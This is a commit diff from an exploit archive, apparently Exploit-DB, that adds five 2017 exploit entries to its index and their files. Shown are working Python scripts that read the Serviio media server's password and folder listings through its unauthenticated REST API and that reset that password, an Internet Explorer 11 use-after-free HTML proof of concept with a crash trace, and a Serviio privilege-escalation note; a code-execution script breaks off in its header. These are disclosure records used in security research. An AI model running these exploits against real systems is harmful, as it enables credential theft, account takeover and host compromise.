DB: 2017-05-04
5 new exploits Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution
This commit is contained in:
parent
6515e26356
commit
b473ba51f3
6 changed files with 590 additions and 0 deletions
|
@ -5482,6 +5482,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
|
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
|
||||||
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
|
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
|
||||||
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
|
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
|
||||||
|
41957,platforms/windows/dos/41957.html,"Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
|
||||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||||
|
@ -8967,6 +8968,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
|
41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
|
||||||
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
|
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
|
||||||
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
|
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
|
||||||
|
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
|
||||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||||
|
@ -37805,3 +37807,6 @@ id,file,description,date,author,platform,type,port
|
||||||
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
|
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
|
||||||
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
|
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
|
||||||
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
|
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
|
||||||
|
41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0
|
||||||
|
41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0
|
||||||
|
41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
141
platforms/java/webapps/41958.py
Executable file
141
platforms/java/webapps/41958.py
Executable file
|
@ -0,0 +1,141 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Petr Nejedly | Six Lines Ltd
|
||||||
|
# Product web page: http://www.serviio.org
|
||||||
|
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
|
||||||
|
#
|
||||||
|
# Summary: Serviio is a free media server. It allows you to stream your media
|
||||||
|
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
|
||||||
|
# games console or mobile phone) on your connected home network.
|
||||||
|
#
|
||||||
|
# Vendor:
|
||||||
|
# "Security:
|
||||||
|
# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
|
||||||
|
# so that you can be sure your content is only accessed by you. Make sure you keep your password
|
||||||
|
# secure."
|
||||||
|
#
|
||||||
|
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
|
||||||
|
# by an information disclosure vulnerability due to improper access control enforcement
|
||||||
|
# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
|
||||||
|
# via a specially crafted request, to gain access to potentially sensitive information.
|
||||||
|
#
|
||||||
|
# Tested on: Restlet-Framework/2.2
|
||||||
|
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2017-5404
|
||||||
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
|
||||||
|
#
|
||||||
|
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 12.12.2016
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import xml.etree.ElementTree as ET
|
||||||
|
from urllib2 import Request, urlopen
|
||||||
|
|
||||||
|
if (len(sys.argv) <= 2):
|
||||||
|
print '[*] Usage: serviio_id.py <ip address> <port>'
|
||||||
|
print '[*] Example: serviio_id.py 10.211.55.3 23423'
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
port = sys.argv[2]
|
||||||
|
|
||||||
|
headers = {'Accept': 'application/xml'}
|
||||||
|
request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
|
||||||
|
print '\nPrinting ServiioLinks:'
|
||||||
|
print '----------------------\n'
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
roottree = ET.fromstring(response_body)
|
||||||
|
|
||||||
|
for URLs in roottree.iter('serviioLink'):
|
||||||
|
print URLs.text
|
||||||
|
|
||||||
|
print
|
||||||
|
|
||||||
|
headers = {'Accept': 'application/xml'}
|
||||||
|
#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
|
||||||
|
request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
|
||||||
|
print '\nPrinting directories:'
|
||||||
|
print '---------------------\n'
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
roottree = ET.fromstring(response_body)
|
||||||
|
|
||||||
|
for URLs in roottree.iter('path'):
|
||||||
|
print URLs.text
|
||||||
|
|
||||||
|
print
|
||||||
|
|
||||||
|
headers = {'Accept': 'application/xml'}
|
||||||
|
request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
|
||||||
|
print '\nPrinting mediabrowser password:'
|
||||||
|
print '-------------------------------\n'
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
roottree = ET.fromstring(response_body)
|
||||||
|
|
||||||
|
for URLs in roottree.iter('remoteUserPassword'):
|
||||||
|
print URLs.text
|
||||||
|
|
||||||
|
print
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
rewt@zslab:~# python serviio_id.py 10.211.55.3 23423
|
||||||
|
|
||||||
|
Printing ServiioLinks:
|
||||||
|
----------------------
|
||||||
|
|
||||||
|
serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
|
||||||
|
serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
|
||||||
|
serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource
|
||||||
|
|
||||||
|
|
||||||
|
Printing directories:
|
||||||
|
---------------------
|
||||||
|
|
||||||
|
/etc/apache2
|
||||||
|
/etc/asl
|
||||||
|
/etc/cups
|
||||||
|
/etc/defaults
|
||||||
|
/etc/emond.d
|
||||||
|
/etc/mach_init.d
|
||||||
|
/etc/mach_init_per_login_session.d
|
||||||
|
/etc/mach_init_per_user.d
|
||||||
|
/etc/manpaths.d
|
||||||
|
/etc/newsyslog.d
|
||||||
|
/etc/openldap
|
||||||
|
/etc/pam.d
|
||||||
|
/etc/paths.d
|
||||||
|
/etc/periodic
|
||||||
|
/etc/pf.anchors
|
||||||
|
/etc/postfix
|
||||||
|
/etc/ppp
|
||||||
|
/etc/racoon
|
||||||
|
/etc/security
|
||||||
|
/etc/snmp
|
||||||
|
/etc/ssh
|
||||||
|
/etc/ssl
|
||||||
|
/etc/sudoers.d
|
||||||
|
|
||||||
|
|
||||||
|
Printing mediabrowser password:
|
||||||
|
-------------------------------
|
||||||
|
|
||||||
|
s3cr3to
|
||||||
|
|
||||||
|
rewt@zslab:~#
|
||||||
|
'''
|
77
platforms/java/webapps/41960.py
Executable file
77
platforms/java/webapps/41960.py
Executable file
|
@ -0,0 +1,77 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Petr Nejedly | Six Lines Ltd
|
||||||
|
# Product web page: http://www.serviio.org
|
||||||
|
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
|
||||||
|
#
|
||||||
|
# Summary: Serviio is a free media server. It allows you to stream your media
|
||||||
|
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
|
||||||
|
# games console or mobile phone) on your connected home network.
|
||||||
|
#
|
||||||
|
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
|
||||||
|
# by an unauthenticated password modification vulnerability due to improper access
|
||||||
|
# control enforcement of the Configuration REST API. A remote attacker can exploit this,
|
||||||
|
# via a specially crafted request, to change the login password for the mediabrowser protected
|
||||||
|
# page.
|
||||||
|
#
|
||||||
|
# Tested on: Restlet-Framework/2.2
|
||||||
|
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2017-5407
|
||||||
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php
|
||||||
|
#
|
||||||
|
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 12.12.2016
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import xml.etree.ElementTree as ET
|
||||||
|
from urllib2 import Request, urlopen
|
||||||
|
|
||||||
|
if (len(sys.argv) <= 3):
|
||||||
|
print '[*] Usage: serviio_pwd.py <ipaddress> <port> <newpassword>'
|
||||||
|
print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2'
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.
|
||||||
|
lozi = sys.argv[3]
|
||||||
|
|
||||||
|
values = """
|
||||||
|
<remoteAccess>
|
||||||
|
<remoteUserPassword>{0}</remoteUserPassword>
|
||||||
|
<preferredRemoteDeliveryQuality>ORIGINAL</preferredRemoteDeliveryQuality>
|
||||||
|
<portMappingEnabled>true</portMappingEnabled>
|
||||||
|
<externalAddress>myserviio.dyndns.com</externalAddress>
|
||||||
|
</remoteAccess>"""
|
||||||
|
|
||||||
|
put = values.format(lozi)
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
'Content-Type': 'application/xml',
|
||||||
|
'Accept': 'application/xml'
|
||||||
|
}
|
||||||
|
request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers)
|
||||||
|
request.get_method = lambda: 'PUT'
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
roottree = ET.fromstring(response_body)
|
||||||
|
|
||||||
|
for errorcode in roottree.iter('errorCode'):
|
||||||
|
print "\nReceived error code: "+errorcode.text
|
||||||
|
|
||||||
|
print 'Password successfully changed to: '+lozi
|
||||||
|
print 'Go to: http://'+host+':23424/mediabrowser\n'
|
145
platforms/windows/dos/41957.html
Executable file
145
platforms/windows/dos/41957.html
Executable file
|
@ -0,0 +1,145 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
|
||||||
|
<meta http-equiv="Expires" content="0" />
|
||||||
|
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
|
||||||
|
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
|
||||||
|
<meta http-equiv="Pragma" content="no-cache" />
|
||||||
|
<style type="text/css">
|
||||||
|
body{
|
||||||
|
background-color:black;
|
||||||
|
font-color:red;
|
||||||
|
};
|
||||||
|
</style>
|
||||||
|
|
||||||
|
<script type='text/javascript'></script>
|
||||||
|
<script type="text/javascript" language="JavaScript">
|
||||||
|
|
||||||
|
/********************************
|
||||||
|
* Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
|
||||||
|
* Google Dork: n/a
|
||||||
|
* Date: 03.05.2017
|
||||||
|
* Exploit Author: Marcin Ressel
|
||||||
|
* TT: @r_esselm
|
||||||
|
* Vendor Homepage: www.microsoft.com
|
||||||
|
* Software Link: n/a
|
||||||
|
* Version: 11.0.9600.18638
|
||||||
|
* Tested on: Windows 7
|
||||||
|
* CVE : n/a
|
||||||
|
* ****************************
|
||||||
|
(151c.10a4): Access violation - code c0000005 (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
|
||||||
|
eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
|
||||||
|
MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
|
||||||
|
706af750 ff36 push dword ptr [esi] ds:002b:1195cfa0=????????
|
||||||
|
0:007> !heap -p -a @esi
|
||||||
|
address 1195cfa0 found in
|
||||||
|
_DPH_HEAP_ROOT @ 9f61000
|
||||||
|
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
|
||||||
|
ef4230c: 1195c000 2000
|
||||||
|
743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
|
||||||
|
76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
|
||||||
|
76f4a863 ntdll!RtlpFreeHeap+0x0000005d
|
||||||
|
76ef2bd5 ntdll!RtlFreeHeap+0x00000142
|
||||||
|
769c14ad kernel32!HeapFree+0x00000014
|
||||||
|
707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
|
||||||
|
6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
|
||||||
|
7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
|
||||||
|
702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
|
||||||
|
702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
|
||||||
|
700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
|
||||||
|
700c5484 MSHTML!CFrameSite::Passivate+0x00000024
|
||||||
|
6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
|
||||||
|
6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
|
||||||
|
705517cb MSHTML!CBase::JSBind_Release+0x00000050
|
||||||
|
6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
|
||||||
|
6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
|
||||||
|
6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
|
||||||
|
6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
|
||||||
|
6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
|
||||||
|
6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
|
||||||
|
6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
|
||||||
|
6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
|
||||||
|
6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
|
||||||
|
6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
|
||||||
|
6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
|
||||||
|
709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
|
||||||
|
7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
|
||||||
|
706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
|
||||||
|
7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
|
||||||
|
70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
|
||||||
|
7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
|
||||||
|
*
|
||||||
|
*/
|
||||||
|
|
||||||
|
var ref = [];
|
||||||
|
var doc = null;
|
||||||
|
var dom = null;
|
||||||
|
var trg = null;
|
||||||
|
var trg_parent = null;
|
||||||
|
var text_r = null;
|
||||||
|
var select_o = null;
|
||||||
|
|
||||||
|
function handle() {
|
||||||
|
|
||||||
|
try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
|
||||||
|
try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
|
||||||
|
try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
|
||||||
|
try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
|
||||||
|
try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
|
||||||
|
try{text_r.select();}catch(e){}
|
||||||
|
try{tree_r.setEnd(ref[0],0);}catch(e){}
|
||||||
|
try{select_o.selectAllChildren(doc.body);}catch(e){}
|
||||||
|
try{tree_r.surroundContents(ref[0]);}catch(e){}
|
||||||
|
try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
|
||||||
|
try{tree_r.selectNodeContents(document.body);}catch(e){}
|
||||||
|
try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function testcase() {
|
||||||
|
|
||||||
|
var e1f = document.getElementById("e1");
|
||||||
|
doc = document.getElementById("t1").contentWindow.document;
|
||||||
|
|
||||||
|
e = e1f.contentWindow.document.createElement("ins");
|
||||||
|
e.cite = 'about:blank';
|
||||||
|
rf = doc.body.appendChild(e);
|
||||||
|
ref.push(rf);
|
||||||
|
e = e1f.contentWindow.document.createElement("iframe");
|
||||||
|
rf = doc.body.appendChild(e);
|
||||||
|
ref.push(rf);
|
||||||
|
|
||||||
|
dom = doc.getElementsByTagName("*");
|
||||||
|
trg = dom[3];
|
||||||
|
trg_parent = doc.body;
|
||||||
|
text_r = doc.body.createTextRange();
|
||||||
|
tree_r = doc.createRange();
|
||||||
|
tree_r.setStart(trg,0);
|
||||||
|
tree_r.setEnd(trg,0);
|
||||||
|
select_o = window.getSelection();
|
||||||
|
|
||||||
|
var ob = new MutationObserver(handle);
|
||||||
|
ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true });
|
||||||
|
|
||||||
|
try {
|
||||||
|
trg.insertBefore(document.createElement("div"),ref[1]);
|
||||||
|
} catch(e) {}
|
||||||
|
|
||||||
|
doc.adoptNode(trg.attributes[0]);
|
||||||
|
trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "À";
|
||||||
|
tmp = trg;
|
||||||
|
}
|
||||||
|
|
||||||
|
</script>
|
||||||
|
<title>IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
|
||||||
|
</head>
|
||||||
|
<body onload='testcase();'>
|
||||||
|
<iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
|
||||||
|
</body>
|
||||||
|
</html>
|
66
platforms/windows/local/41959.txt
Executable file
66
platforms/windows/local/41959.txt
Executable file
|
@ -0,0 +1,66 @@
|
||||||
|
Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Petr Nejedly | Six Lines Ltd
|
||||||
|
Product web page: http://www.serviio.org
|
||||||
|
Affected version: 1.8.0.0 PRO
|
||||||
|
|
||||||
|
Summary: Serviio is a free media server. It allows you to stream your media
|
||||||
|
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
|
||||||
|
games console or mobile phone) on your connected home network.
|
||||||
|
|
||||||
|
Desc: The application suffers from an unquoted search path issue impacting the service
|
||||||
|
'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially
|
||||||
|
allow an authorized but non-privileged local user to execute arbitrary code with elevated
|
||||||
|
privileges on the system. A successful attempt would require the local user to be able to
|
||||||
|
insert their code in the system root path undetected by the OS or other security applications
|
||||||
|
where it could potentially be executed during application startup or reboot. If successful, the
|
||||||
|
local user’s code would execute with the elevated privileges of the application.
|
||||||
|
|
||||||
|
Serviio also suffers from improper permissions which can be used by a simple authenticated user
|
||||||
|
that can change the executable file with a binary of choice. The vulnerability exist due to the
|
||||||
|
improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and
|
||||||
|
its sub-directories.
|
||||||
|
|
||||||
|
|
||||||
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
||||||
|
Microsoft Windows 7 Ultimate SP1 (EN)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2017-5405
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php
|
||||||
|
|
||||||
|
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
|
||||||
|
|
||||||
|
|
||||||
|
12.12.2016
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
|
C:\>sc qc Serviio
|
||||||
|
[SC] QueryServiceConfig SUCCESS
|
||||||
|
|
||||||
|
SERVICE_NAME: Serviio
|
||||||
|
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
||||||
|
START_TYPE : 2 AUTO_START
|
||||||
|
ERROR_CONTROL : 1 NORMAL
|
||||||
|
BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe
|
||||||
|
LOAD_ORDER_GROUP :
|
||||||
|
TAG : 0
|
||||||
|
DISPLAY_NAME : Serviio
|
||||||
|
DEPENDENCIES : HTTP
|
||||||
|
SERVICE_START_NAME : LocalSystem
|
||||||
|
|
||||||
|
C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
|
||||||
|
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
||||||
|
BUILTIN\Administrators:(I)(F)
|
||||||
|
|
||||||
|
Successfully processed 1 files; Failed processing 0 files
|
||||||
|
|
||||||
|
C:\>
|
156
platforms/windows/webapps/41961.py
Executable file
156
platforms/windows/webapps/41961.py
Executable file
|
@ -0,0 +1,156 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Petr Nejedly | Six Lines Ltd
|
||||||
|
# Product web page: http://www.serviio.org
|
||||||
|
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
|
||||||
|
#
|
||||||
|
# Summary: Serviio is a free media server. It allows you to stream your media
|
||||||
|
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
|
||||||
|
# games console or mobile phone) on your connected home network.
|
||||||
|
#
|
||||||
|
# Desc: The version of Serviio installed on the remote Windows host is affected by
|
||||||
|
# an unauthenticated remote code execution vulnerability due to improper access control
|
||||||
|
# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper
|
||||||
|
# calls cmd.exe to execute system commands. A remote attacker can exploit this with a
|
||||||
|
# simple JSON request, gaining system access with SYSTEM privileges via a specially
|
||||||
|
# crafted request and escape sequence.
|
||||||
|
#
|
||||||
|
# =================================================================================
|
||||||
|
# org/serviio/ui/resources/server/ActionsServerResource.java:
|
||||||
|
# -----------------------------------------------------------
|
||||||
|
#
|
||||||
|
# private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {
|
||||||
|
# this.validateParameters(representation, 2);
|
||||||
|
# try {
